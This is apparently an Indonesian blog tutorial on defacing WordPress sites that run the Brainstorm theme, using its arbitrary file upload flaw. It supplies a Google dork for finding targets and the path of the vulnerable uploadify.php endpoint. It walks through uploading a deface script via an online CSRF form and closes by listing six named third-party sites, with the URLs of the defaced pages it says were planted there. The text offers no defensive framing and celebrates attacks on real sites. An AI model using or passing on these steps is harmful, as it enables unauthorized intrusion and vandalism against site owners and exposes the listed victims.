Tutorial Deface Metode WP Brainstorm Arbitrary File Upload Vulnerability
Hallo Gaes.Pada Tutorial Hari ini
Saya akan Share Metode Deface Dengan Exploit Wordpress Brainstorm.Nah Buat
Kalian Yang Masih Belajar Teknik Deface Exploit Yang Satu ini Sangat Cocok di
Coba, Karena Mudah Dan Gak Terlalu Membingungkan, Sebelum Ke Tutorial Lebih
Lanjut.Silahkan Kalian Siapkan Bahan Bahan Untuk Berbuka Puasa ,Mcsd Saya Bahan
Bahan Deface berikut ini :
1.Hp Apasajalah
2.Kuota
3.Script Deface [
DISINI ]
5.Csrf [ DISINI ]
6.Kopi [ PUASA GAN ]
Nah Jika Bahan Bahan Udah Siap ,Silahkan Dorking Dengan Dork Yang Udah Saya
Siapin
Dork :- inurl:/wp-content/themes/brainstorm/
Setelah Dork Udah We Share ,Kalian Jangan Lupa Copy Exploitnya
Exploit : -wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
Jika Sudah Kalian Copy Semua, Pergi Ke Google Lalu Search Dengan Dork di Atas.
Jika Sudah Kalian Pilih Salah Satu Web Yang Mau Di Jadiin Target.Lalu Kalian
Masukan Exploit Yang Udah Kalian Copy, Contoh : www.target.coli/[PATH]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php ,
Nanti Kalo Vuln Bakalan Blank.
Jika Sudah Blank.Kalian Copy
Semua, Masukan Ke CSRF Online,Lalu Kalian Pilih Post nya dengan Filedata.
Jika Sudah, Nanti Akan Ada Tempat
Upload,Nah Disini Kalian Upload Sc Deface Kalian.Jika Sudah, Kalian Tekan
Upload.
Nah Disitu Nanti Bakalan Ada Link
Akses Nya,Kalian Tinggal Copy url Tersebut.Nah Mudah Banget Kan ? Semoga
Bermanfaat.
Hasil Deface :
http://old.dansklive.dk/wp-content/uploads/dx.html
http://www.serfatygrafia.es/wp-content/uploads/2018/03/dx.html
http://sididom.com/wp-content/uploads/2018/03/dx.html
http://www.studioroma.be/wp-content/uploads/2018/03/dx.html
http://hotelmanjupalace.com/wp-content/uploads/2018/04/exc.html
http://howbc.org/wp-content/uploads/2018/04/exc.html